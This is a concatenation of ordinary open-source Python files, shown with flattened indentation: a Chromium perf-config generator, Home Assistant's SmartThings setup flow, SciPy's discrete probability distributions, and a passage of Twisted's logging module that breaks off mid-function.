(update_labs_docs_md, 'docs/speed/perf_lab_platforms.md'),
]
def _source_filepath(posix_path):
return os.path.join(path_util.GetChromiumSrcDir(), *posix_path.split('/'))
def validate_all_files():
"""Validate all generated files."""
tempdir = tempfile.mkdtemp()
try:
for run_updater, src_file in ALL_UPDATERS_AND_FILES:
real_filepath = _source_filepath(src_file)
temp_filepath = os.path.join(tempdir, os.path.basename(real_filepath))
if not (os.path.exists(real_filepath) and
run_updater(temp_filepath) and
filecmp.cmp(temp_filepath, real_filepath)):
return False
finally:
shutil.rmtree(tempdir)
return True
def update_all_files():
"""Update all generated files."""
for run_updater, src_file in ALL_UPDATERS_AND_FILES:
if not run_updater(_source_filepath(src_file)):
print('Failed updating:', src_file)
return False
print('Updated:', src_file)
return True
def main(args):
parser = argparse.ArgumentParser(
description=('Generate perf test\' json config and benchmark.csv. '
'This needs to be done anytime you add/remove any existing'
'benchmarks in tools/perf/benchmarks.'))
parser.add_argument(
'--validate-only', action='store_true', default=False,
help=('Validate whether the perf json generated will be the same as the '
'existing configs. This does not change the contain of existing '
'configs'))
options = parser.parse_args(args)
if options.validate_only:
if validate_all_files():
print('All the perf config files are up-to-date. \\o/')
return 0
else:
print('Not all perf config files are up-to-date. Please run %s '
'to update them.' % sys.argv[0])
return 1
else:
return 0 if update_all_files() else 1
|
|
"""Config flow to configure SmartThings."""
import logging
from aiohttp import ClientResponseError
from pysmartthings import APIResponseError, AppOAuth, SmartThings
from pysmartthings.installedapp import format_install_url
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
CONF_ACCESS_TOKEN,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
HTTP_FORBIDDEN,
HTTP_UNAUTHORIZED,
)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import (
APP_OAUTH_CLIENT_NAME,
APP_OAUTH_SCOPES,
CONF_APP_ID,
CONF_INSTALLED_APP_ID,
CONF_LOCATION_ID,
CONF_REFRESH_TOKEN,
DOMAIN,
VAL_UID_MATCHER,
)
from .smartapp import (
create_app,
find_app,
format_unique_id,
get_webhook_url,
setup_smartapp,
setup_smartapp_endpoint,
update_app,
validate_webhook_requirements,
)
_LOGGER = logging.getLogger(__name__)
class SmartThingsFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle configuration of SmartThings integrations."""
VERSION = 2
def __init__(self):
"""Create a new instance of the flow handler."""
self.access_token = None
self.app_id = None
self.api = None
self.oauth_client_secret = None
self.oauth_client_id = None
self.installed_app_id = None
self.refresh_token = None
self.location_id = None
async def async_step_import(self, user_input=None):
"""Occurs when a previously entry setup fails and is re-initiated."""
return await self.async_step_user(user_input)
async def async_step_user(self, user_input=None):
"""Validate and confirm webhook setup."""
await setup_smartapp_endpoint(self.hass)
webhook_url = get_webhook_url(self.hass)
# Abort if the webhook is invalid
if not validate_webhook_requirements(self.hass):
return self.async_abort(
reason="invalid_webhook_url",
description_placeholders={
"webhook_url": webhook_url,
"component_url": "https://www.home-assistant.io/integrations/smartthings/",
},
)
# Show the confirmation
if user_input is None:
return self.async_show_form(
step_id="user",
description_placeholders={"webhook_url": webhook_url},
)
# Show the next screen
return await self.async_step_pat()
async def async_step_pat(self, user_input=None):
"""Get the Personal Access Token and validate it."""
errors = {}
if user_input is None or CONF_ACCESS_TOKEN not in user_input:
return self._show_step_pat(errors)
self.access_token = user_input[CONF_ACCESS_TOKEN]
# Ensure token is a UUID
if not VAL_UID_MATCHER.match(self.access_token):
errors[CONF_ACCESS_TOKEN] = "token_invalid_format"
return self._show_step_pat(errors)
# Setup end-point
self.api = SmartThings(async_get_clientsession(self.hass), self.access_token)
try:
app = await find_app(self.hass, self.api)
if app:
await app.refresh() # load all attributes
await update_app(self.hass, app)
# Find an existing entry to copy the oauth client
existing = next(
(
entry
for entry in self._async_current_entries()
if entry.data[CONF_APP_ID] == app.app_id
),
None,
)
if existing:
self.oauth_client_id = existing.data[CONF_CLIENT_ID]
self.oauth_client_secret = existing.data[CONF_CLIENT_SECRET]
else:
# Get oauth client id/secret by regenerating it
app_oauth = AppOAuth(app.app_id)
app_oauth.client_name = APP_OAUTH_CLIENT_NAME
app_oauth.scope.extend(APP_OAUTH_SCOPES)
client = await self.api.generate_app_oauth(app_oauth)
self.oauth_client_secret = client.client_secret
self.oauth_client_id = client.client_id
else:
app, client = await create_app(self.hass, self.api)
self.oauth_client_secret = client.client_secret
self.oauth_client_id = client.client_id
setup_smartapp(self.hass, app)
self.app_id = app.app_id
except APIResponseError as ex:
if ex.is_target_error():
errors["base"] = "webhook_error"
else:
errors["base"] = "app_setup_error"
_LOGGER.exception(
"API error setting up the SmartApp: %s", ex.raw_error_response
)
return self._show_step_pat(errors)
except ClientResponseError as ex:
if ex.status == HTTP_UNAUTHORIZED:
errors[CONF_ACCESS_TOKEN] = "token_unauthorized"
_LOGGER.debug(
"Unauthorized error received setting up SmartApp", exc_info=True
)
elif ex.status == HTTP_FORBIDDEN:
errors[CONF_ACCESS_TOKEN] = "token_forbidden"
_LOGGER.debug(
"Forbidden error received setting up SmartApp", exc_info=True
)
else:
errors["base"] = "app_setup_error"
_LOGGER.exception("Unexpected error setting up the SmartApp")
return self._show_step_pat(errors)
except Exception: # pylint:disable=broad-except
errors["base"] = "app_setup_error"
_LOGGER.exception("Unexpected error setting up the SmartApp")
return self._show_step_pat(errors)
return await self.async_step_select_location()
async def async_step_select_location(self, user_input=None):
"""Ask user to select the location to setup."""
if user_input is None or CONF_LOCATION_ID not in user_input:
# Get available locations
existing_locations = [
entry.data[CONF_LOCATION_ID] for entry in self._async_current_entries()
]
locations = await self.api.locations()
locations_options = {
location.location_id: location.name
for location in locations
if location.location_id not in existing_locations
}
if not locations_options:
return self.async_abort(reason="no_available_locations")
return self.async_show_form(
step_id="select_location",
data_schema=vol.Schema(
{vol.Required(CONF_LOCATION_ID): vol.In(locations_options)}
),
)
self.location_id = user_input[CONF_LOCATION_ID]
await self.async_set_unique_id(format_unique_id(self.app_id, self.location_id))
return await self.async_step_authorize()
async def async_step_authorize(self, user_input=None):
"""Wait for the user to authorize the app installation."""
user_input = {} if user_input is None else user_input
self.installed_app_id = user_input.get(CONF_INSTALLED_APP_ID)
self.refresh_token = user_input.get(CONF_REFRESH_TOKEN)
if self.installed_app_id is None:
# Launch the external setup URL
url = format_install_url(self.app_id, self.location_id)
return self.async_external_step(step_id="authorize", url=url)
return self.async_external_step_done(next_step_id="install")
def _show_step_pat(self, errors):
if self.access_token is None:
# Get the token from an existing entry to make it easier to setup multiple locations.
self.access_token = next(
(
entry.data.get(CONF_ACCESS_TOKEN)
for entry in self._async_current_entries()
),
None,
)
return self.async_show_form(
step_id="pat",
data_schema=vol.Schema(
{vol.Required(CONF_ACCESS_TOKEN, default=self.access_token): str}
),
errors=errors,
description_placeholders={
"token_url": "https://account.smartthings.com/tokens",
"component_url": "https://www.home-assistant.io/integrations/smartthings/",
},
)
async def async_step_install(self, data=None):
"""Create a config entry at completion of a flow and authorization of the app."""
data = {
CONF_ACCESS_TOKEN: self.access_token,
CONF_REFRESH_TOKEN: self.refresh_token,
CONF_CLIENT_ID: self.oauth_client_id,
CONF_CLIENT_SECRET: self.oauth_client_secret,
CONF_LOCATION_ID: self.location_id,
CONF_APP_ID: self.app_id,
CONF_INSTALLED_APP_ID: self.installed_app_id,
}
location = await self.api.location(data[CONF_LOCATION_ID])
return self.async_create_entry(title=location.name, data=data)
|
|
#
# Author: Travis Oliphant 2002-2011 with contributions from
# SciPy Developers 2004-2011
#
from __future__ import division, print_function, absolute_import
from scipy import special
from scipy.special import entr, gammaln as gamln
from numpy import floor, ceil, log, exp, sqrt, log1p, expm1, tanh, cosh, sinh
import numpy as np
import numpy.random as mtrand
from ._distn_infrastructure import (
rv_discrete, _lazywhere, _ncx2_pdf, _ncx2_cdf, get_distribution_names)
class binom_gen(rv_discrete):
"""A binomial discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `binom` is::
binom.pmf(k) = choose(n, k) * p**k * (1-p)**(n-k)
for ``k`` in ``{0, 1,..., n}``.
`binom` takes ``n`` and ``p`` as shape parameters.
%(example)s
"""
def _rvs(self, n, p):
return mtrand.binomial(n, p, self._size)
def _argcheck(self, n, p):
self.b = n
return (n >= 0) & (p >= 0) & (p <= 1)
def _logpmf(self, x, n, p):
k = floor(x)
combiln = (gamln(n+1) - (gamln(k+1) + gamln(n-k+1)))
return combiln + special.xlogy(k, p) + special.xlog1py(n-k, -p)
def _pmf(self, x, n, p):
return exp(self._logpmf(x, n, p))
def _cdf(self, x, n, p):
k = floor(x)
vals = special.bdtr(k, n, p)
return vals
def _sf(self, x, n, p):
k = floor(x)
return special.bdtrc(k, n, p)
def _ppf(self, q, n, p):
vals = ceil(special.bdtrik(q, n, p))
vals1 = np.maximum(vals - 1, 0)
temp = special.bdtr(vals1, n, p)
return np.where(temp >= q, vals1, vals)
def _stats(self, n, p, moments='mv'):
q = 1.0 - p
mu = n * p
var = n * p * q
g1, g2 = None, None
if 's' in moments:
g1 = (q - p) / sqrt(var)
if 'k' in moments:
g2 = (1.0 - 6*p*q) / var
return mu, var, g1, g2
def _entropy(self, n, p):
k = np.r_[0:n + 1]
vals = self._pmf(k, n, p)
return np.sum(entr(vals), axis=0)
binom = binom_gen(name='binom')
class bernoulli_gen(binom_gen):
"""A Bernoulli discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `bernoulli` is::
bernoulli.pmf(k) = 1-p if k = 0
= p if k = 1
for ``k`` in ``{0, 1}``.
`bernoulli` takes ``p`` as shape parameter.
%(example)s
"""
def _rvs(self, p):
return binom_gen._rvs(self, 1, p)
def _argcheck(self, p):
return (p >= 0) & (p <= 1)
def _logpmf(self, x, p):
return binom._logpmf(x, 1, p)
def _pmf(self, x, p):
return binom._pmf(x, 1, p)
def _cdf(self, x, p):
return binom._cdf(x, 1, p)
def _sf(self, x, p):
return binom._sf(x, 1, p)
def _ppf(self, q, p):
return binom._ppf(q, 1, p)
def _stats(self, p):
return binom._stats(1, p)
def _entropy(self, p):
return entr(p) + entr(1-p)
bernoulli = bernoulli_gen(b=1, name='bernoulli')
class nbinom_gen(rv_discrete):
"""A negative binomial discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `nbinom` is::
nbinom.pmf(k) = choose(k+n-1, n-1) * p**n * (1-p)**k
for ``k >= 0``.
`nbinom` takes ``n`` and ``p`` as shape parameters.
%(example)s
"""
def _rvs(self, n, p):
return mtrand.negative_binomial(n, p, self._size)
def _argcheck(self, n, p):
return (n > 0) & (p >= 0) & (p <= 1)
def _pmf(self, x, n, p):
return exp(self._logpmf(x, n, p))
def _logpmf(self, x, n, p):
coeff = gamln(n+x) - gamln(x+1) - gamln(n)
return coeff + n*log(p) + special.xlog1py(x, -p)
def _cdf(self, x, n, p):
k = floor(x)
return special.betainc(n, k+1, p)
def _sf_skip(self, x, n, p):
# skip because special.nbdtrc doesn't work for 0<n<1
k = floor(x)
return special.nbdtrc(k, n, p)
def _ppf(self, q, n, p):
vals = ceil(special.nbdtrik(q, n, p))
vals1 = (vals-1).clip(0.0, np.inf)
temp = self._cdf(vals1, n, p)
return np.where(temp >= q, vals1, vals)
def _stats(self, n, p):
Q = 1.0 / p
P = Q - 1.0
mu = n*P
var = n*P*Q
g1 = (Q+P)/sqrt(n*P*Q)
g2 = (1.0 + 6*P*Q) / (n*P*Q)
return mu, var, g1, g2
nbinom = nbinom_gen(name='nbinom')
class geom_gen(rv_discrete):
"""A geometric discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `geom` is::
geom.pmf(k) = (1-p)**(k-1)*p
for ``k >= 1``.
`geom` takes ``p`` as shape parameter.
%(example)s
"""
def _rvs(self, p):
return mtrand.geometric(p, size=self._size)
def _argcheck(self, p):
return (p <= 1) & (p >= 0)
def _pmf(self, k, p):
return np.power(1-p, k-1) * p
def _logpmf(self, k, p):
return (k-1) * log(1-p) + log(p)
def _cdf(self, x, p):
k = floor(x)
return -expm1(log1p(-p)*k)
def _sf(self, x, p):
return np.exp(self._logsf(x, p))
def _logsf(self, x, p):
k = floor(x)
return k*log1p(-p)
def _ppf(self, q, p):
vals = ceil(log(1.0-q)/log(1-p))
temp = self._cdf(vals-1, p)
return np.where((temp >= q) & (vals > 0), vals-1, vals)
def _stats(self, p):
mu = 1.0/p
qr = 1.0-p
var = qr / p / p
g1 = (2.0-p) / sqrt(qr)
g2 = np.polyval([1, -6, 6], p)/(1.0-p)
return mu, var, g1, g2
geom = geom_gen(a=1, name='geom', longname="A geometric")
class hypergeom_gen(rv_discrete):
"""A hypergeometric discrete random variable.
The hypergeometric distribution models drawing objects from a bin.
M is the total number of objects, n is total number of Type I objects.
The random variate represents the number of Type I objects in N drawn
without replacement from the total population.
%(before_notes)s
Notes
-----
The probability mass function is defined as::
pmf(k, M, n, N) = choose(n, k) * choose(M - n, N - k) / choose(M, N),
for max(0, N - (M-n)) <= k <= min(n, N)
Examples
--------
>>> from scipy.stats import hypergeom
>>> import matplotlib.pyplot as plt
Suppose we have a collection of 20 animals, of which 7 are dogs. Then if
we want to know the probability of finding a given number of dogs if we
choose at random 12 of the 20 animals, we can initialize a frozen
distribution and plot the probability mass function:
>>> [M, n, N] = [20, 7, 12]
>>> rv = hypergeom(M, n, N)
>>> x = np.arange(0, n+1)
>>> pmf_dogs = rv.pmf(x)
>>> fig = plt.figure()
>>> ax = fig.add_subplot(111)
>>> ax.plot(x, pmf_dogs, 'bo')
>>> ax.vlines(x, 0, pmf_dogs, lw=2)
>>> ax.set_xlabel('# of dogs in our group of chosen animals')
>>> ax.set_ylabel('hypergeom PMF')
>>> plt.show()
Instead of using a frozen distribution we can also use `hypergeom`
methods directly. To for example obtain the cumulative distribution
function, use:
>>> prb = hypergeom.cdf(x, M, n, N)
And to generate random numbers:
>>> R = hypergeom.rvs(M, n, N, size=10)
"""
def _rvs(self, M, n, N):
return mtrand.hypergeometric(n, M-n, N, size=self._size)
def _argcheck(self, M, n, N):
cond = rv_discrete._argcheck(self, M, n, N)
cond &= (n <= M) & (N <= M)
self.a = max(N-(M-n), 0)
self.b = min(n, N)
return cond
def _logpmf(self, k, M, n, N):
tot, good = M, n
bad = tot - good
return gamln(good+1) - gamln(good-k+1) - gamln(k+1) + gamln(bad+1) \
- gamln(bad-N+k+1) - gamln(N-k+1) - gamln(tot+1) + gamln(tot-N+1) \
+ gamln(N+1)
def _pmf(self, k, M, n, N):
# same as the following but numerically more precise
# return comb(good, k) * comb(bad, N-k) / comb(tot, N)
return exp(self._logpmf(k, M, n, N))
def _stats(self, M, n, N):
# tot, good, sample_size = M, n, N
# "wikipedia".replace('N', 'M').replace('n', 'N').replace('K', 'n')
M, n, N = 1.*M, 1.*n, 1.*N
m = M - n
p = n/M
mu = N*p
var = m*n*N*(M - N)*1.0/(M*M*(M-1))
g1 = (m - n)*(M-2*N) / (M-2.0) * sqrt((M-1.0) / (m*n*N*(M-N)))
g2 = M*(M+1) - 6.*N*(M-N) - 6.*n*m
g2 *= (M-1)*M*M
g2 += 6.*n*N*(M-N)*m*(5.*M-6)
g2 /= n * N * (M-N) * m * (M-2.) * (M-3.)
return mu, var, g1, g2
def _entropy(self, M, n, N):
k = np.r_[N - (M - n):min(n, N) + 1]
vals = self.pmf(k, M, n, N)
return np.sum(entr(vals), axis=0)
def _sf(self, k, M, n, N):
"""More precise calculation, 1 - cdf doesn't cut it."""
# This for loop is needed because `k` can be an array. If that's the
# case, the sf() method makes M, n and N arrays of the same shape. We
# therefore unpack all inputs args, so we can do the manual
# integration.
res = []
for quant, tot, good, draw in zip(k, M, n, N):
# Manual integration over probability mass function. More accurate
# than integrate.quad.
k2 = np.arange(quant + 1, draw + 1)
res.append(np.sum(self._pmf(k2, tot, good, draw)))
return np.asarray(res)
hypergeom = hypergeom_gen(name='hypergeom')
# FIXME: Fails _cdfvec
class logser_gen(rv_discrete):
"""A Logarithmic (Log-Series, Series) discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `logser` is::
logser.pmf(k) = - p**k / (k*log(1-p))
for ``k >= 1``.
`logser` takes ``p`` as shape parameter.
%(example)s
"""
def _rvs(self, p):
# looks wrong for p>0.5, too few k=1
# trying to use generic is worse, no k=1 at all
return mtrand.logseries(p, size=self._size)
def _argcheck(self, p):
return (p > 0) & (p < 1)
def _pmf(self, k, p):
return -np.power(p, k) * 1.0 / k / log(1 - p)
def _stats(self, p):
r = log(1 - p)
mu = p / (p - 1.0) / r
mu2p = -p / r / (p - 1.0)**2
var = mu2p - mu*mu
mu3p = -p / r * (1.0+p) / (1.0 - p)**3
mu3 = mu3p - 3*mu*mu2p + 2*mu**3
g1 = mu3 / np.power(var, 1.5)
mu4p = -p / r * (
1.0 / (p-1)**2 - 6*p / (p - 1)**3 + 6*p*p / (p-1)**4)
mu4 = mu4p - 4*mu3p*mu + 6*mu2p*mu*mu - 3*mu**4
g2 = mu4 / var**2 - 3.0
return mu, var, g1, g2
logser = logser_gen(a=1, name='logser', longname='A logarithmic')
class poisson_gen(rv_discrete):
"""A Poisson discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `poisson` is::
poisson.pmf(k) = exp(-mu) * mu**k / k!
for ``k >= 0``.
`poisson` takes ``mu`` as shape parameter.
%(example)s
"""
def _rvs(self, mu):
return mtrand.poisson(mu, self._size)
def _logpmf(self, k, mu):
Pk = k*log(mu)-gamln(k+1) - mu
return Pk
def _pmf(self, k, mu):
return exp(self._logpmf(k, mu))
def _cdf(self, x, mu):
k = floor(x)
return special.pdtr(k, mu)
def _sf(self, x, mu):
k = floor(x)
return special.pdtrc(k, mu)
def _ppf(self, q, mu):
vals = ceil(special.pdtrik(q, mu))
vals1 = np.maximum(vals - 1, 0)
temp = special.pdtr(vals1, mu)
return np.where(temp >= q, vals1, vals)
def _stats(self, mu):
var = mu
tmp = np.asarray(mu)
g1 = sqrt(1.0 / tmp)
g2 = 1.0 / tmp
return mu, var, g1, g2
poisson = poisson_gen(name="poisson", longname='A Poisson')
class planck_gen(rv_discrete):
"""A Planck discrete exponential random variable.
%(before_notes)s
Notes
-----
The probability mass function for `planck` is::
planck.pmf(k) = (1-exp(-lambda_))*exp(-lambda_*k)
for ``k*lambda_ >= 0``.
`planck` takes ``lambda_`` as shape parameter.
%(example)s
"""
def _argcheck(self, lambda_):
if (lambda_ > 0):
self.a = 0
self.b = np.inf
return 1
elif (lambda_ < 0):
self.a = -np.inf
self.b = 0
return 1
else:
return 0
def _pmf(self, k, lambda_):
fact = (1-exp(-lambda_))
return fact*exp(-lambda_*k)
def _cdf(self, x, lambda_):
k = floor(x)
return 1-exp(-lambda_*(k+1))
def _ppf(self, q, lambda_):
vals = ceil(-1.0/lambda_ * log1p(-q)-1)
vals1 = (vals-1).clip(self.a, np.inf)
temp = self._cdf(vals1, lambda_)
return np.where(temp >= q, vals1, vals)
def _stats(self, lambda_):
mu = 1/(exp(lambda_)-1)
var = exp(-lambda_)/(expm1(-lambda_))**2
g1 = 2*cosh(lambda_/2.0)
g2 = 4+2*cosh(lambda_)
return mu, var, g1, g2
def _entropy(self, lambda_):
l = lambda_
C = (1-exp(-l))
return l*exp(-l)/C - log(C)
planck = planck_gen(name='planck', longname='A discrete exponential ')
class boltzmann_gen(rv_discrete):
"""A Boltzmann (Truncated Discrete Exponential) random variable.
%(before_notes)s
Notes
-----
The probability mass function for `boltzmann` is::
boltzmann.pmf(k) = (1-exp(-lambda_)*exp(-lambda_*k)/(1-exp(-lambda_*N))
for ``k = 0,..., N-1``.
`boltzmann` takes ``lambda_`` and ``N`` as shape parameters.
%(example)s
"""
def _pmf(self, k, lambda_, N):
fact = (1-exp(-lambda_))/(1-exp(-lambda_*N))
return fact*exp(-lambda_*k)
def _cdf(self, x, lambda_, N):
k = floor(x)
return (1-exp(-lambda_*(k+1)))/(1-exp(-lambda_*N))
def _ppf(self, q, lambda_, N):
qnew = q*(1-exp(-lambda_*N))
vals = ceil(-1.0/lambda_ * log(1-qnew)-1)
vals1 = (vals-1).clip(0.0, np.inf)
temp = self._cdf(vals1, lambda_, N)
return np.where(temp >= q, vals1, vals)
def _stats(self, lambda_, N):
z = exp(-lambda_)
zN = exp(-lambda_*N)
mu = z/(1.0-z)-N*zN/(1-zN)
var = z/(1.0-z)**2 - N*N*zN/(1-zN)**2
trm = (1-zN)/(1-z)
trm2 = (z*trm**2 - N*N*zN)
g1 = z*(1+z)*trm**3 - N**3*zN*(1+zN)
g1 = g1 / trm2**(1.5)
g2 = z*(1+4*z+z*z)*trm**4 - N**4 * zN*(1+4*zN+zN*zN)
g2 = g2 / trm2 / trm2
return mu, var, g1, g2
boltzmann = boltzmann_gen(name='boltzmann',
longname='A truncated discrete exponential ')
class randint_gen(rv_discrete):
"""A uniform discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `randint` is::
randint.pmf(k) = 1./(high - low)
for ``k = low, ..., high - 1``.
`randint` takes ``low`` and ``high`` as shape parameters.
Note the difference to the numpy ``random_integers`` which
returns integers on a *closed* interval ``[low, high]``.
%(example)s
"""
def _argcheck(self, low, high):
self.a = low
self.b = high - 1
return (high > low)
def _pmf(self, k, low, high):
p = np.ones_like(k) / (high - low)
return np.where((k >= low) & (k < high), p, 0.)
def _cdf(self, x, low, high):
k = floor(x)
return (k - low + 1.) / (high - low)
def _ppf(self, q, low, high):
vals = ceil(q * (high - low) + low) - 1
vals1 = (vals - 1).clip(low, high)
temp = self._cdf(vals1, low, high)
return np.where(temp >= q, vals1, vals)
def _stats(self, low, high):
m2, m1 = np.asarray(high), np.asarray(low)
mu = (m2 + m1 - 1.0) / 2
d = m2 - m1
var = (d*d - 1) / 12.0
g1 = 0.0
g2 = -6.0/5.0 * (d*d + 1.0) / (d*d - 1.0)
return mu, var, g1, g2
def _rvs(self, low, high=None):
"""An array of *size* random integers >= ``low`` and < ``high``.
If ``high`` is ``None``, then range is >=0 and < low
"""
return mtrand.randint(low, high, self._size)
def _entropy(self, low, high):
return log(high - low)
randint = randint_gen(name='randint', longname='A discrete uniform '
'(random integer)')
# FIXME: problems sampling.
class zipf_gen(rv_discrete):
"""A Zipf discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `zipf` is::
zipf.pmf(k, a) = 1/(zeta(a) * k**a)
for ``k >= 1``.
`zipf` takes ``a`` as shape parameter.
%(example)s
"""
def _rvs(self, a):
return mtrand.zipf(a, size=self._size)
def _argcheck(self, a):
return a > 1
def _pmf(self, k, a):
Pk = 1.0 / special.zeta(a, 1) / k**a
return Pk
def _munp(self, n, a):
return _lazywhere(
a > n + 1, (a, n),
lambda a, n: special.zeta(a - n, 1) / special.zeta(a, 1),
np.inf)
zipf = zipf_gen(a=1, name='zipf', longname='A Zipf')
class dlaplace_gen(rv_discrete):
"""A Laplacian discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `dlaplace` is::
dlaplace.pmf(k) = tanh(a/2) * exp(-a*abs(k))
for ``a > 0``.
`dlaplace` takes ``a`` as shape parameter.
%(example)s
"""
def _pmf(self, k, a):
return tanh(a/2.0) * exp(-a * abs(k))
def _cdf(self, x, a):
k = floor(x)
f = lambda k, a: 1.0 - exp(-a * k) / (exp(a) + 1)
f2 = lambda k, a: exp(a * (k+1)) / (exp(a) + 1)
return _lazywhere(k >= 0, (k, a), f=f, f2=f2)
def _ppf(self, q, a):
const = 1 + exp(a)
vals = ceil(np.where(q < 1.0 / (1 + exp(-a)), log(q*const) / a - 1,
-log((1-q) * const) / a))
vals1 = vals - 1
return np.where(self._cdf(vals1, a) >= q, vals1, vals)
def _stats(self, a):
ea = exp(a)
mu2 = 2.*ea/(ea-1.)**2
mu4 = 2.*ea*(ea**2+10.*ea+1.) / (ea-1.)**4
return 0., mu2, 0., mu4/mu2**2 - 3.
def _entropy(self, a):
return a / sinh(a) - log(tanh(a/2.0))
dlaplace = dlaplace_gen(a=-np.inf,
name='dlaplace', longname='A discrete Laplacian')
class skellam_gen(rv_discrete):
"""A Skellam discrete random variable.
%(before_notes)s
Notes
-----
Probability distribution of the difference of two correlated or
uncorrelated Poisson random variables.
Let k1 and k2 be two Poisson-distributed r.v. with expected values
lam1 and lam2. Then, ``k1 - k2`` follows a Skellam distribution with
parameters ``mu1 = lam1 - rho*sqrt(lam1*lam2)`` and
``mu2 = lam2 - rho*sqrt(lam1*lam2)``, where rho is the correlation
coefficient between k1 and k2. If the two Poisson-distributed r.v.
are independent then ``rho = 0``.
Parameters mu1 and mu2 must be strictly positive.
For details see: http://en.wikipedia.org/wiki/Skellam_distribution
`skellam` takes ``mu1`` and ``mu2`` as shape parameters.
%(example)s
"""
def _rvs(self, mu1, mu2):
n = self._size
return mtrand.poisson(mu1, n) - mtrand.poisson(mu2, n)
def _pmf(self, x, mu1, mu2):
px = np.where(x < 0,
_ncx2_pdf(2*mu2, 2*(1-x), 2*mu1)*2,
_ncx2_pdf(2*mu1, 2*(1+x), 2*mu2)*2)
# ncx2.pdf() returns nan's for extremely low probabilities
return px
def _cdf(self, x, mu1, mu2):
x = floor(x)
px = np.where(x < 0,
_ncx2_cdf(2*mu2, -2*x, 2*mu1),
1-_ncx2_cdf(2*mu1, 2*(x+1), 2*mu2))
return px
def _stats(self, mu1, mu2):
mean = mu1 - mu2
var = mu1 + mu2
g1 = mean / sqrt((var)**3)
g2 = 1 / var
return mean, var, g1, g2
skellam = skellam_gen(a=-np.inf, name="skellam", longname='A Skellam')
# Collect names of classes and objects in this module.
pairs = list(globals().items())
_distn_names, _distn_gen_names = get_distribution_names(pairs, rv_discrete)
__all__ = _distn_names + _distn_gen_names
|
|
# -*- test-case-name: twisted.logger.test.test_global -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module includes process-global state associated with the logging system,
and implementation of logic for managing that global state.
"""
import sys
import warnings
from twisted.python.compat import currentframe
from twisted.python.reflect import qual
from ._buffer import LimitedHistoryLogObserver
from ._observer import LogPublisher
from ._filter import FilteringLogObserver, LogLevelFilterPredicate
from ._logger import Logger
from ._format import formatEvent
from ._levels import LogLevel
from ._io import LoggingFile
from ._file import FileLogObserver
MORE_THAN_ONCE_WARNING = (
"Warning: primary log target selected twice at <{fileNow}:{lineNow}> - "
"previously selected at <{fileThen:logThen}>. Remove one of the calls to "
"beginLoggingTo."
)
class LogBeginner(object):
"""
A L{LogBeginner} holds state related to logging before logging has begun,
and begins logging when told to do so. Logging "begins" when someone has
selected a set of observers, like, for example, a L{FileLogObserver} that
writes to a file on disk, or to standard output.
Applications will not typically need to instantiate this class, except
those which intend to initialize the global logging system themselves,
which may wish to instantiate this for testing. The global instance for
the current process is exposed as
L{twisted.logger.globalLogBeginner}.
Before logging has begun, a L{LogBeginner} will:
1. Log any critical messages (e.g.: unhandled exceptions) to the given
file-like object.
2. Save (a limited number of) log events in a
L{LimitedHistoryLogObserver}.
@ivar _initialBuffer: A buffer of messages logged before logging began.
@type _initialBuffer: L{LimitedHistoryLogObserver}
@ivar _publisher: The log publisher passed in to L{LogBeginner}'s
constructor.
@type _publisher: L{LogPublisher}
@ivar _log: The logger used to log messages about the operation of the
L{LogBeginner} itself.
@type _log: L{Logger}
@ivar _temporaryObserver: If not C{None}, an L{ILogObserver} that observes
events on C{_publisher} for this L{LogBeginner}.
@type _temporaryObserver: L{ILogObserver} or L{NoneType}
@ivar _stdio: An object with C{stderr} and C{stdout} attributes (like the
L{sys} module) which will be replaced when redirecting standard I/O.
@type _stdio: L{object}
"""
def __init__(self, publisher, errorStream, stdio, warningsModule):
self._initialBuffer = LimitedHistoryLogObserver()
self._publisher = publisher
self._log = Logger(observer=publisher)
self._stdio = stdio
self._warningsModule = warningsModule
self._temporaryObserver = LogPublisher(
self._initialBuffer,
FilteringLogObserver(
FileLogObserver(
errorStream, lambda event: formatEvent(event) + u"\n"
),
[LogLevelFilterPredicate(defaultLogLevel=LogLevel.critical)]
)
)
publisher.addObserver(self._temporaryObserver)
self._oldshowwarning = warningsModule.showwarning
def beginLoggingTo(
self, observers, discardBuffer=False, redirectStandardIO=True
):
"""
Begin logging to the given set of observers. This will:
1. Add all the observers given in C{observers} to the
L{LogPublisher} associated with this L{LogBeginner}.
2. Optionally re-direct standard output and standard error streams
to the logging system.
3. Re-play any messages that were previously logged to that
publisher to the new observers, if C{discardBuffer} is not set.
4. Stop logging critical errors from the L{LogPublisher} as strings
to the C{errorStream} associated with this L{LogBeginner}, and
allow them to be logged normally.
5. Re-direct warnings from the L{warnings} module associated with
this L{LogBeginner} to log messages.
@note: Since a L{LogBeginner} is designed to encapsulate the transition
between process-startup and log-system-configuration, this method
is intended to be invoked I{once}.
@param observers: The observers to register.
@type observers: iterable of L{ILogObserver}s
@param discardBuffer: Whether to discard the buffer and not re-play it
to the added observers. (This argument is provided mainly for
compatibility with legacy concerns.)
@type discardBuffer: L{bool}
@param redirectStandardIO: If true, redirect standard output and
standard error to the observers.
@type redirectStandardIO: L{bool}
"""
caller = currentframe(1)
filename, lineno = caller.f_code.co_filename, caller.f_lineno
for observer in observers:
self._publisher.addObserver(observer)
if self._temporaryObserver is not None:
self._publisher.removeObserver(self._temporaryObserver)
if not discardBuffer:
self._initialBuffer.replayTo(self._publisher)
self._temporaryObserver = None
self._warningsModule.showwarning = self.showwarning
else:
previousFile, previousLine = self._previousBegin
self._log.warn(
MORE_THAN_ONCE_WARNING,
fileNow=filename, lineNow=lineno,
fileThen=previousFile, lineThen=previousLine,
)
self._previousBegin = filename, lineno
if redirectStandardIO:
streams = [("stdout", LogLevel.info), ("stderr", LogLevel.error)]
else:
streams = []
for (stream, level) in streams:
oldStream = getattr(self._stdio, stream)
loggingFile = LoggingFile(
logger=Logger(namespace=stream, observer=self._publisher),
level=level,
